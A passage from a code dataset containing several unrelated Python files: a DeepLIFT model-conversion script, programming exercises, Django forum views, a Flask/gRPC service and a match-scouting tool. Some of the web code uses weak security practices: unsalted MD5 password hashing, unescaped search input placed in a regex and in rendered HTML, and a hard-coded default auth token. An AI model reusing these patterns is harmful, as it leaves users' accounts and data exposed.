model's predictions\n\tParameters\n\t----------\n\talpha: an element from the alpha matrix, a matrix of target y values weighted\n\t\tby proportion of strains with resistance data for any given drug\n\ty_pred: model-predicted y values\n\n\tReturns\n\t-------\n\tscalar value of the masked weighted accuracy.\n\t\"\"\"\n\n\ttotal = K.sum(K.cast(K.not_equal(alpha, 0.), K.floatx()))\n\ty_true_ = K.cast(K.greater(alpha, 0.), K.floatx())\n\tmask = K.cast(K.not_equal(alpha, 0.), K.floatx())\n\tcorrect = K.sum(K.cast(K.equal(y_true_, K.round(y_pred)), K.floatx()) * mask)\n\treturn correct / total\n\ndef convertKerasJSONtoDeepLIFT(kerasJSON_str):\n jsonData = json.loads(kerasJSON_str)\n layersData = jsonData[\"config\"][\"layers\"]\n jsonData[\"config\"] = layersData\n return json.dumps(jsonData)\n\n\n#create model\ndeeplift_trialweights = \"../model_training/saved_models/ccp_deepliftweights.h5\"\n\ndeeplift_model_json = \"CNN_model.json\"\n#\nfilter_size = 12\n\nmodel = keras.models.Sequential()\n\n#TODO: replace X.shape with passed argument\n\n##### Define the model (must be the same architecture as used for training)\nmodel.add(layers.Conv2D(\n 64, (4, filter_size),\n data_format='channels_last',\n activation='relu',\n input_shape = (4, 10291, 18), name='conv2d'\n))\nmodel.add(layers.Conv2D(64, (1,12), activation='relu', name='conv1d'))\nmodel.add(layers.MaxPooling2D((1,3), name='max_pooling1d'))\nmodel.add(layers.Conv2D(32, (1,3), activation='relu', name='conv1d_1'))\nmodel.add(layers.Conv2D(32, (1,3), activation='relu', name='conv1d_2'))\nmodel.add(layers.MaxPooling2D((1,3), name='max_pooling1d_1'))\nmodel.add(layers.Flatten(name='flatten'))\nmodel.add(layers.Dense(256, activation='relu', name='d1'))\nmodel.add(layers.Dense(256, activation='relu', name='d2'))\nmodel.add(layers.Dense(13, activation='sigmoid', name='d4'))\n\nmodel.compile(optimizer=Adam(lr=np.exp(-1.0 * 9)),\n loss=masked_multi_weighted_bce,\n metrics=[masked_weighted_accuracy])\n\nmodel.summary()\n\n#load weights\nmodel.load_weights(deeplift_trialweights)\n\n#save json\nmodel_json = model.to_json()\nwith open(deeplift_model_json, \"w\") as json_file:\n json_file.write(model_json)\n\nprint(\"model saved\")\n\n###### Step 4: Read in Deeplift model and define method (rules) to use for assessment#####\n## Load our model from the json file\nour_model = model_from_json(open(deeplift_model_json).read())\nour_model.load_weights(deeplift_trialweights)\n\n# Create the deeplift models\nmethod_to_model = OrderedDict()\n\nwith h5py.File(deeplift_trialweights) as keras_model_weights :\n\n for method_name, nonlinear_mxts_mode in [\n #The genomics default = rescale on conv layers, revealcance on fully-connected\n ('rescale_conv_revealcancel_fc', NonlinearMxtsMode.DeepLIFT_GenomicsDefault)]:\n method_to_model[method_name] = kc.convert_model_from_saved_files(\n h5_file=deeplift_trialweights,\n json_file=deeplift_model_json,\n nonlinear_mxts_mode=deeplift.layers.NonlinearMxtsMode.DeepLIFT_GenomicsDefault\n )\n\n\n###### Step 5: sanity check make sure that our predictions match with keras and deeplift#####\n\n###make sure predictions are the same as the original model\n\nmodel_to_test = method_to_model['rescale_conv_revealcancel_fc']\n\ndeeplift_prediction_func = compile_func([model_to_test.get_layers()[0].get_activation_vars()],\n model_to_test.get_layers()[-1].get_activation_vars())\n\noriginal_model_predictions = our_model.predict([X_h37rv], batch_size=200)\n\nconverted_model_predictions = deeplift.util.run_function_in_batches(\n 
input_data_list=[X_h37rv],\n func=deeplift_prediction_func,\n batch_size=200,\n progress_update=None)\n\nprint(original_model_predictions)\nprint(converted_model_predictions)\nprint(\"maximum difference in predictions:\",np.max(np.array(converted_model_predictions)-np.array(original_model_predictions)))\nassert np.max(np.array(converted_model_predictions)-np.array(original_model_predictions)) < 10**-5\n","sub_path":"md_cnn/deeplift/00.convert_model_to_deeplift.py","file_name":"00.convert_model_to_deeplift.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"571632358","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExercise 080\n\"\"\"\n\nalphabet1=\"abcdefghijklmnopqrstuvwxyz\"\nalphabet2=\"abcdefghijklmnopqrstuvwxyz\"\n\nsolution=[] \n\nfor first in alphabet1:\n for second in alphabet2:\n if first != second:\n combo=''.join(sorted(first + second))\n if combo not in solution:\n solution.insert(0,combo)\n\nfor pair in sorted(solution):\n print(pair)\n","sub_path":"exercices/080/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"344939969","text":"import time\nclass Timer: \n def __init__(self,time):\n self.time = time\n \n def __str__(self):\n return str(self.time)\n \n def countdown(self):\n countdown = self.time\n #countdown = int(input('Please enter number of seconds you want to countdown: '))\n while countdown > 0:\n print(countdown)\n time.sleep(1)\n countdown -= 1\n if countdown == 0:\n print('BLASTOFF!')\n break\n \ndef main():\n time = int(input('Please enter number of seconds you want to countdown: '))\n T = Timer(time)\n T.countdown()\n \nif __name__ == \"__main__\": \n main()\n \n ","sub_path":"problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"373101263","text":"\"\"\"\n1041\nrobot bounded in circle\nmedium\n\nOn an infinite plane, a robot initially stands at (0, 0) and faces north.\nThe robot can receive one of three instructions:\n\n\"G\": go straight 1 unit;\n\"L\": turn 90 degrees to the left;\n\"R\": turn 90 degrees to the right.\n\nThe robot performs the instructions given in order, and repeats them forever.\n\nReturn true if and only if there exists a circle in the plane such that the\nrobot never leaves the circle.\n\"\"\"\n\n\nclass Solution:\n def isRobotBounded(self, instructions: str) -> bool:\n left = instructions.count(\"L\")\n right = instructions.count(\"R\")\n if left % 4 != right % 4:\n return True\n\n x = [1, 0, -1, 0]\n y = [0, 1, 0, -1]\n\n left = right = dir = 0\n loc = [0, 0]\n for c in instructions:\n if c == \"G\":\n dir += (left-right)\n dir %= 4\n loc[0] += x[dir]\n loc[1] += y[dir]\n left = right = 0\n elif c == \"L\":\n left += 1\n else:\n right += 1\n if loc[0] == loc[1] == 0:\n return True\n else:\n return False\n\nstring = \"RRGRRGLLLRLGGLGLLGRLRLGLRLRRGLGGLLRRRLRLRLLGRGLGRRRGRLG\"\nsol = Solution()\nprint(sol.isRobotBounded(string))\n\n\n\n","sub_path":"Q1041.py","file_name":"Q1041.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"194968559","text":"import hashlib\nimport random\nimport re\nimport time\nimport io\nimport os\nimport uuid\nfrom _md5 import md5\n\nfrom django.conf import 
settings\nfrom django.contrib.auth.hashers import make_password\nfrom django.core.cache import cache\nfrom django.core.paginator import Paginator\nfrom django.core.serializers import json\nfrom django.db.models import Q, Count\nfrom django.http import HttpResponse, JsonResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.template import loader\nfrom django.urls import reverse\nfrom django.views.decorators.cache import cache_page\n\nfrom app.models import Nav, Guest, Publishment, Announcement, Comment, CommentReply\nfrom app.toolfunc import md5HashPwd, createVcode\n\n\n\n# 首页\ndef index(request, pagenum=1):\n ptype = request.GET.get('ptype', None)\n # 根据帖子类型查询\n if ptype:\n publishment = Publishment.p_manager.filter(ptype=ptype).all().order_by('-paddtime')\n ptype = int(ptype)\n # 默认查询全部记录\n else:\n publishment = Publishment.p_manager.all().order_by('-paddtime')\n pager = Paginator(publishment, 5)\n pagePub = pager.page(pagenum)\n data = {\n 'pagePub': pagePub,\n 'pagerange': pager.page_range,\n 'pagecount': pager.num_pages,\n 'currentpage': pagePub.number,\n 'ptype': ptype,\n }\n return render(request, 'app/index.html', context=data)\n\n\n# 搜索\ndef search(request, pagenum):\n psearch = request.GET.get('psearch', None)\n publishment = Publishment.p_manager.filter(Q(ptitle__contains=psearch)).all().order_by('-paddtime')\n pager = Paginator(publishment, 3)\n pagePub = pager.page(pagenum)\n\n data = {\n 'pagePub': pagePub,\n 'pagerange': pager.page_range,\n 'pagecount': pager.num_pages,\n 'currentpage': pagePub.number,\n 'psearch': psearch\n }\n # return render(request, 'app/search.html', context=data)\n template = loader.get_template('app/search.html')\n content = template.render(context=data)\n rere = re.compile(r'\\*\\*(.*)(' + psearch + r')(.*)\\*\\*')\n result, n = rere.subn(r'\\1\\2\\3', content)\n return HttpResponse(result)\n\n\n# 注册\ndef register(request):\n if request.method == 'GET':\n return render(request, 'app/register.html')\n else:\n post = request.POST\n gname = post.get('nickname', None)\n gemail = post.get('email', None)\n gpwd = post.get('pwd', None)\n ggender = post.get('gender', None)\n cpwd = post.get('cpwd', None)\n vcode = post.get('vcode', None)\n errcode = 0\n msg = ''\n res = ''\n\n # validate data\n if not gname or not gemail or not gpwd or not ggender or not cpwd or not vcode:\n res = 'fail'\n errcode = 1\n msg = '所有信息都要填!'\n elif vcode.lower() != request.session['vcode'].lower():\n res = 'fail'\n errcode = 1\n msg = '验证码错误!'\n elif gpwd != cpwd:\n res = 'fail'\n errcode = 1\n msg = '两次输入的密码不一样!'\n elif Guest.objects.filter(gname=gname).first():\n res = 'fail'\n errcode = 1\n msg = '昵称已存在'\n else:\n # hash pwd\n gpwd = md5HashPwd(gpwd.strip())\n\n # save data\n try:\n guest = Guest()\n guest.gname = gname.strip()\n guest.ggender = ggender.strip()\n guest.gemail = gemail.strip()\n guest.gpwd = gpwd\n guest.save()\n\n # genarate account\n g = Guest.objects.filter(gname=gname).first()\n gaccount = str(g.id + 1000)\n g.gaccount = gaccount\n g.save()\n except BaseException as e:\n res = 'fail'\n errcode = 2\n msg = '服务器出了点小问题。。。'\n else:\n res = 'ok'\n errcode = 0\n msg = '注册成功,您的账号是 ' + gaccount + ',清牢记!'\n\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n\n# 登录\ndef login(request):\n if request.method == 'GET':\n return render(request, 'app/login.html')\n else:\n post = request.POST\n gaccount = post.get('account', None)\n gpwd = post.get('pwd', None)\n vcode = 
post.get('vcode', None)\n errcode = 0\n msg = ''\n res = ''\n if vcode.lower() != request.session['vcode'].lower():\n errcode = 1\n msg = '验证码错误!'\n res = 'fail'\n if gaccount and gpwd:\n # hash\n gpwd = md5HashPwd(gpwd)\n # validate\n g = Guest.objects.filter(gaccount=gaccount).first()\n if g and g.gpwd == gpwd:\n request.session['gname'] = g.gname\n request.session['gaccount'] = gaccount\n request.session['headphoto'] = 'uploads/' + g.gphoto.name\n errcode = 0\n msg = '登录成功!'\n res = 'ok'\n else:\n errcode = 1\n msg = '登录失败,账号或密码错误!'\n res = 'fail'\n else:\n errcode = 1\n msg = '所有参数都要填写!'\n res = 'fail'\n\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n\n# 退出账号\ndef logout(request):\n\n request.session.flush()\n return render(request, 'app/logout.html')\n\n\n# 个人信息\ndef myinfo(request):\n guest = Guest.objects.filter(gname=request.session.get('gname',None)).first()\n data = {\n 'guest': guest,\n 'gphoto': 'uploads/' + guest.gphoto.name\n }\n return render(request, 'app/myinfo.html', context=data)\n\n\n# 获取验证码\ndef getVcode(request):\n vcodeinfo = createVcode(4)\n request.session['vcode'] = vcodeinfo[0]\n return HttpResponse(vcodeinfo[1], 'image/png')\n\n\n# 更新密码\ndef modifypwd(request):\n errcode = 3\n msg = 'fail'\n res = '请求方法错误'\n if request.method == 'POST':\n gname = request.session.get('gname', None)\n oldpwd = request.POST.get('oldpwd', None)\n npwd = request.POST.get('npwd', None)\n cpwd = request.POST.get('cpwd', None)\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not oldpwd or not npwd or not cpwd:\n errcode = 1\n msg = '所有字段都是必填的!'\n res = 'fail'\n elif npwd != cpwd:\n errcode = 1\n msg = '两次输入的密码不一样!'\n res = 'fail'\n else:\n guest = Guest.objects.filter(gname=gname).first()\n if guest.gpwd != md5HashPwd(oldpwd.strip()):\n errcode = 1\n msg = '修改失败,原密码错误!'\n res = 'fail'\n else:\n try:\n guest.gpwd = md5HashPwd(npwd.strip())\n guest.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n else:\n errcode = 0\n msg = '修改成功!请尝试用新的密码登录!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n\n# 设置头像\ndef setphoto(request):\n errcode = 3\n msg = 'fail'\n res = '请求方法错误'\n if request.method == 'POST':\n gname = request.session.get('gname', None)\n photo = request.FILES.get('photo', None)\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not photo:\n errcode = 1\n msg = '未上传任何图片'\n res = 'fail'\n\n else:\n try:\n photo.name = ''.join(str(uuid.uuid4()).split('-'))\n guest = Guest.objects.filter(gname=gname).first()\n guest.gphoto = photo\n guest.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n print(e)\n else:\n errcode = 0\n msg = '头像设置成功!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n\n# 发布页面\n@cache_page(60*60, cache='redis_cache')\ndef publishPage(request):\n return render(request, 'app/publish.html')\n\n\n# 发布\ndef publish(request):\n errcode = 3\n msg = 'fail'\n res = '请求方法错误'\n if request.method == 'POST':\n gname = request.session.get('gname', None)\n post = request.POST\n ptitle = post.get('ptitle', None)\n ptype = post.get('ptype', None)\n pcontent = post.get('pcontent', None)\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not ptitle or not ptype or not pcontent:\n errcode = 1\n msg = '所有字段都是必填的!'\n res = 'fail'\n elif len(ptitle) > 20:\n errcode = 1\n msg = '标题太长了!'\n res = 'fail'\n else:\n pguest = 
Guest.objects.filter(gname=gname).first()\n ptype = Nav.n_manager.filter(id=ptype).first()\n\n try:\n publishment = Publishment()\n publishment.ptitle = ptitle\n publishment.pcontent = pcontent\n publishment.ptype = ptype\n publishment.pguest = pguest\n publishment.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n print(e)\n else:\n errcode = 0\n msg = '发布成功!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n\n# 发布的内容详情\ndef detail(request, pubId):\n pub = Publishment.p_manager.all().filter(id=pubId).first()\n # 根据session判断是否点击过\n isclick = request.session.get('isclick' + pubId, None)\n print(isclick)\n if not isclick:\n pub.pclick = pub.pclick + 1\n pub.save()\n request.session['isclick' + pubId] = 1\n\n comment = Comment.objects.filter(cbelong=pubId).all()\n # print(comment)\n data = {\n 'publish': pub,\n 'comment': comment\n }\n return render(request, 'app/detail.html', context=data)\n\n\n# 我的帖子\ndef myPublish(request, pagenum):\n gname = request.session.get('gname', None)\n if gname:\n guest = Guest.objects.filter(gname=gname).first()\n publishment = Publishment.p_manager.filter(pguest=guest).all()\n pager = Paginator(publishment, 4)\n pagePub = pager.page(pagenum)\n\n data = {\n 'pagePub': pagePub,\n 'pagerange': pager.page_range,\n 'pagecount': pager.num_pages,\n 'currentpage': pagePub.number,\n }\n return render(request, 'app/mypublish.html', context=data)\n else:\n return render(request, 'app/login.html')\n\n\n# 编辑帖子\ndef editPublish(request, pubId):\n if request.method == 'POST':\n errcode = 0\n msg = ''\n res = ''\n gname = request.session.get('gname', None)\n post = request.POST\n ptitle = post.get('ptitle', None)\n ptype = post.get('ptype', None)\n pcontent = post.get('pcontent', None)\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not ptitle or not ptype or not pcontent:\n errcode = 1\n msg = '所有字段都是必填的!'\n res = 'fail'\n elif len(ptitle) > 20:\n errcode = 1\n msg = '标题太长了!'\n res = 'fail'\n elif not Publishment.p_manager.filter(id=pubId).first():\n errcode = 1\n msg = '帖子不存在!'\n res = 'fail'\n else:\n try:\n publishment = Publishment.p_manager.get(pk=pubId)\n publishment.ptitle = ptitle\n publishment.pcontent = pcontent\n publishment.ptype = Nav.n_manager.filter(id=ptype).first()\n publishment.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n print(e)\n else:\n errcode = 0\n msg = '保存成功!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n else:\n pub = Publishment.p_manager.get(pk=pubId)\n data = {\n 'publish': pub,\n 'pubId': pubId,\n }\n return render(request, 'app/editpublish.html', context=data)\n\n\n# 公告详情\n@cache_page(60*60, cache='redis_cache')\ndef announce(request, anId):\n announce = Announcement.a_manager.filter(id=anId).first()\n data = {\n 'announce': announce,\n }\n return render(request, 'app/announcement.html', context=data)\n\n\n# 删除帖子\ndef delPublish(request):\n errcode = 3\n msg = 'fail'\n res = '请求方法错误'\n if request.method == 'GET':\n pubId = request.GET.get('pubid', None)\n gname = request.session.get('gname', None)\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not pubId:\n errcode = 1\n msg = '参数缺失'\n res = 'fail'\n elif not Publishment.p_manager.filter(id=pubId).first():\n errcode = 1\n msg = '帖子不存在!'\n res = 'fail'\n else:\n try:\n publishment = Publishment.p_manager.get(pk=pubId)\n publishment.pisdelete = True\n publishment.save()\n except 
BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n print(e)\n else:\n errcode = 0\n msg = '删除成功!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n\n# 评论帖子\ndef comment(request):\n errcode = 3\n msg = 'fail'\n res = '请求方法错误'\n if request.method == 'POST':\n gname = request.session.get('gname', None)\n ccontent = request.POST.get('ccontent', None)\n cbelong = request.POST.get('cbelong', None)\n\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not ccontent or not cbelong:\n errcode = 1\n msg = '参数缺失'\n res = 'fail'\n elif not Publishment.p_manager.filter(id=cbelong).all().first():\n errcode = 1\n msg = '帖子不存在'\n res = 'fail'\n else:\n try:\n cauthor = Guest.objects.filter(gname=gname).all().first()\n comment = Comment()\n comment.ccontent = ccontent\n comment.cbelong = Publishment.p_manager.filter(id=cbelong).all().first()\n comment.cauthor = cauthor\n comment.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n else:\n errcode = 0\n msg = '评论成功!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })\n\n# 回复用户的评论\ndef replyComment(request):\n errcode = 3\n msg = 'fail'\n res = '请求方法错误'\n if request.method == 'POST':\n gname = request.session.get('gname', None)\n crcontent = request.POST.get('crcontent', None)\n crcomment = request.POST.get('crcomment', None)\n crto = request.POST.get('crto', None)\n if not gname:\n errcode = 1\n msg = '尚未登录'\n res = 'fail'\n elif not crcontent or not crcomment or not crto:\n errcode = 1\n msg = '参数缺失'\n res = 'fail'\n elif not Comment.objects.filter(id=crcomment).all().first():\n errcode = 1\n msg = '主评论不存在'\n res = 'fail'\n else:\n try:\n crauthor = Guest.objects.filter(gname=gname).all().first()\n commentreply = CommentReply()\n commentreply.crauthor = crauthor\n commentreply.crcontent = crcontent\n commentreply.crcomment = Comment.objects.filter(id=crcomment).all().first()\n commentreply.crto = Guest.objects.filter(id=crto).all().first()\n commentreply.save()\n except BaseException as e:\n errcode = 2\n msg = '服务器出了点问题。。。'\n res = 'fail'\n else:\n errcode = 0\n msg = '回复成功!'\n res = 'ok'\n return JsonResponse({\n 'res': res,\n 'errcode': errcode,\n 'msg': msg\n })","sub_path":"firstapp/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"243357692","text":"n = int(input())\np = [0, 0]\ntime = 0\n\nfor _ in range(n):\n t, x, y = map(int, input().split())\n dist = abs(x-p[0]) + abs(y-p[1])\n if dist > t-time:\n print('No')\n exit()\n else:\n if (t-time)%dist==0:\n time += dist\n p = [x, y]\n else:\n print('No')\n exit()\n\nprint('Yes')","sub_path":"atcoder/2018/ABC/0121_abc086/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"233426599","text":"import flask\nfrom flask import app, abort, jsonify, request\n\nimport grpc\nimport sys\nimport os\n\nsys.path.append(\"./proto\")\nfrom src.foo.proto import service_pb2 as pb2\nfrom src.foo.proto import service_pb2_grpc as pb2_grpc\n\nimport logging\nfrom pythonjsonlogger import jsonlogger\n\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n# Environment variables\nip = os.getenv(\"LIS_IP\", \"0.0.0.0\")\nport = os.getenv(\"LIS_PORT\", \"4000\")\nbar_endpoint = os.getenv(\"BAR_ENDPOINT\", 
\"bar:4001\")\nauth_token = os.getenv(\"AUTH_TOKEN\", \"123456abcdef\")\n\n# Logs\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\nhandler = logging.FileHandler(\"logs_foo.log\", mode=\"a\")\nformatter = jsonlogger.JsonFormatter(\"%(asctime)s %(name)s %(levelname)s %(message)s\")\nhandler.setFormatter(formatter)\nlog.addHandler(handler)\nlog.info(\"Initialized\")\n\n\n# Error handlers\n@app.errorhandler(400)\ndef bad_request(error):\n log.info(\"bad request\")\n response = {\"Message\": \"Bad request\", \"Code\": \"400\"}\n return jsonify(response), 400\n\n\n@app.errorhandler(401)\ndef bad_request(error):\n log.info(\"unaothorized\")\n response = {\"Message\": \"unauthorized\", \"Code\": \"401\"}\n return jsonify(response), 401\n\n\n@app.errorhandler(503)\ndef service_unavailable(error):\n log.info(\"service unavailable\")\n response = {\"Message\": \"Service unavailable\", \"Code\": \"503\"}\n return jsonify(response), 503\n\n\ndef authentication(token):\n if token != auth_token:\n abort(401)\n\n\n@app.route(\"/foo\", methods=[\"GET\"])\ndef home():\n\n log.info(\"/foo called\")\n\n try:\n with grpc.insecure_channel(bar_endpoint) as channel:\n stub = pb2_grpc.BarServiceStub(channel)\n response = stub.BarFunc(pb2.Request(a=True))\n except grpc.RpcError:\n abort(503)\n\n return f\"foo{response.result}\"\n\n\n@app.route(\"/foos\", methods=[\"GET\"])\ndef homes():\n\n log.info(\"/foos called\")\n\n try:\n authentication(request.headers[\"Authorization\"].split()[1])\n\n with grpc.insecure_channel(bar_endpoint) as channel:\n stub = pb2_grpc.BarServiceStub(channel)\n response = stub.BarFunc(pb2.Request(a=True))\n except grpc.RpcError:\n abort(503)\n\n return f\"foo{response.result}\"\n\n\ntry:\n app.run(host=ip, port=port)\nexcept grpc.RpcError:\n abort(503)\n","sub_path":"src/foo/foo.py","file_name":"foo.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"188050624","text":"'''\nSCOUT ADMIN\n'''\n\nimport json\nimport csv\nimport math\nimport os\nimport requests\nimport urllib2\nclear = lambda: os.system('clear')\nfrom stringcolor import * \ntabRed1 = []\ntabRed2 = []\ntabRed3 = []\ntabBlue1 = []\ntabBlue2 = []\ntabBlue3 = []\nflagString = \"\"\nhelpMenu = True\ndef internet_on():\n try:\n urllib2.urlopen('http://216.58.192.142', timeout=1)\n return True\n except urllib2.URLError as err: \n return False\nmatchNum = 1\ndef TryFile(fileName, station):\n try:\n open(fileName, \"r\")\n return 1\n except IOError:\n print(\"[ERROR] \" + station + \"'s Specified File Doesn't Exist!\")\n return 0\n\nif(TryFile(\"ScoutAdmin.csv\", \"Scouting Admin\") == 1):\n print(\"Importing previous data...\")\n with open(\"ScoutAdmin.csv\") as thistoread:\n dataarray = []\n csv_reader = csv.reader(thistoread, delimiter=\",\")\n #READABLE FORMAT\n for csvconvert in csv_reader:\n dataarray.append(csvconvert)\n numberofmatches = 0\n for num in dataarray:\n numberofmatches += 1\n print(\"There are \" + str(numberofmatches/6) + \" matches loaded in from the previous session...\")\n TOTAL_MATCH_NUM = round(numberofmatches/6)\n for x in range(TOTAL_MATCH_NUM):\n tabBlue1.append(\"U\")\n tabBlue2.append(\"U\")\n tabBlue3.append(\"U\")\n tabRed1.append(\"U\")\n tabRed2.append(\"U\")\n tabRed3.append(\"U\")\n loadIndex = 0\n for tabletFlag in dataarray:\n if(dataarray[loadIndex][0].lower() == \"blue1\"):\n tabBlue1[int(dataarray[loadIndex][1])-1] = (str(dataarray[loadIndex][2].upper()))\n 
elif(dataarray[loadIndex][0].lower() == \"blue2\"):\n tabBlue2[int(dataarray[loadIndex][1])-1] = (str(dataarray[loadIndex][2].upper()))\n elif(dataarray[loadIndex][0].lower() == \"blue3\"):\n tabBlue3[int(dataarray[loadIndex][1])-1] = (str(dataarray[loadIndex][2].upper()))\n elif(dataarray[loadIndex][0].lower() == \"red1\"):\n tabRed1[int(dataarray[loadIndex][1])-1] = (str(dataarray[loadIndex][2].upper()))\n elif(dataarray[loadIndex][0].lower() == \"red2\"):\n tabRed2[int(dataarray[loadIndex][1])-1] = (str(dataarray[loadIndex][2].upper()))\n elif(dataarray[loadIndex][0].lower() == \"red3\"):\n tabRed3[int(dataarray[loadIndex][1])-1] = (str(dataarray[loadIndex][2].upper()))\n loadIndex += 1\n print(tabBlue1)\n input()\n print(\"Done!\")\nelse:\n TOTAL_MATCH_NUM = int(input(\"How many matches are there?\\n> \"))\n for x in range(TOTAL_MATCH_NUM):\n tabBlue1.append(\"U\")\n tabBlue2.append(\"U\")\n tabBlue3.append(\"U\")\n tabRed1.append(\"U\")\n tabRed2.append(\"U\")\n tabRed3.append(\"U\")\n print(tabBlue1)\n\n \n\n\n\nwhile True:\n clear()\n userChoice = input(\"\"\" \"\"\" + cs(\"\", \"magenta\").bold() +\"\"\"\n\n \"\"\" + \n cs(\"Red Team \",\"white\",\"red\") + \"\"\" \"\"\" + cs(\"Blue Team \",\"white\",\"blue\") + \"\"\"\n \"\"\" +\n cs(\"R1 R2 R3 \", \"white\",\"red\").underline() + \"\"\" \"\"\" + cs(\"B1 B2 B3 \",\"white\",\"blue\").underline() + \"\"\"\n \"\"\"\n + (cs(\"\\u2713\", \"green\").bold() if tabRed1[matchNum-1] == \"U\" else cs(\"\\u2691\", \"orangered\").bold()) + \"\"\" \"\"\" + (cs(\"\\u2713\", \"green\").bold() if tabRed2[matchNum-1] == \"U\" else cs(\"\\u2691\", \"orangered\").bold()) + \"\"\" \"\"\" + (cs(\"\\u2713\", \"green\").bold() if tabRed3[matchNum-1] == \"U\" else cs(\"\\u2691\", \"orangered\").bold()) + \"\"\" \"\"\" + (cs(\"\\u2713\", \"green\").bold() if tabBlue1[matchNum-1] == \"U\" else cs(\"\\u2691\", \"orangered\").bold()) + \"\"\" \"\"\" + (cs(\"\\u2713\", \"green\").bold() if tabBlue2[matchNum-1] == \"U\" else cs(\"\\u2691\", \"orangered\").bold()) + \"\"\" \"\"\" + (cs(\"\\u2713\", \"green\").bold() if tabBlue3[matchNum-1] == \"U\" else cs(\"\\u2691\", \"orangered\").bold())+ \"\"\"\n\"\"\" + \n (\"\"\"\n *******************************\n \"N\" to go to next match (Match \"\"\" + str(matchNum+1) + \"\"\")\n \"P\" to go to previous match (Match \"\"\" + str(matchNum-1 if matchNum > 1 else 1) + \"\"\")\n \"SET\" to set current match\n \"H\" to disable help menu\n *******************************\n \"E\" to exit flag and save\n *******************************\n \"F\" to flag a tablet match\n \"U\" to mark a tablet as usable\\n> \"\"\" if helpMenu == True else \"\"\"\n [F] Flag\n [U] Unflag\n [H] Help Menu\\n> \"\"\")).upper()\n if(userChoice == \"SET\"):\n matchNum = int(input(\"Which match would you like to switch to?\\n> \"))\n if(matchNum > len(tabBlue1)):\n matchNum = len(tabBlue1)\n elif(matchNum < 1):\n matchNum = 1\n elif(userChoice == \"N\"):\n if(matchNum < len(tabBlue1)):\n matchNum += 1\n elif(userChoice == \"P\"):\n if(matchNum > 1):\n matchNum -= 1\n elif(userChoice == \"H\"):\n if(helpMenu == True):\n helpMenu = False\n else:\n helpMenu = True\n elif(userChoice == \"E\"):\n open(\"ScoutAdmin.csv\", \"w\").close()\n flaggedOutput = open(\"ScoutAdmin.csv\", \"w\")\n flagString = \"\"\n index = 0\n print(tabBlue1[3])\n for x in range(len(tabBlue1)):\n flagString = flagString + \"Blue1,\" + str(x+1) + \",\" + tabBlue1[x] + \"\\n\"\n index += 1\n index = 0\n for x in range(len(tabBlue2)):\n flagString = flagString + \"Blue2,\" + str(x+1) + 
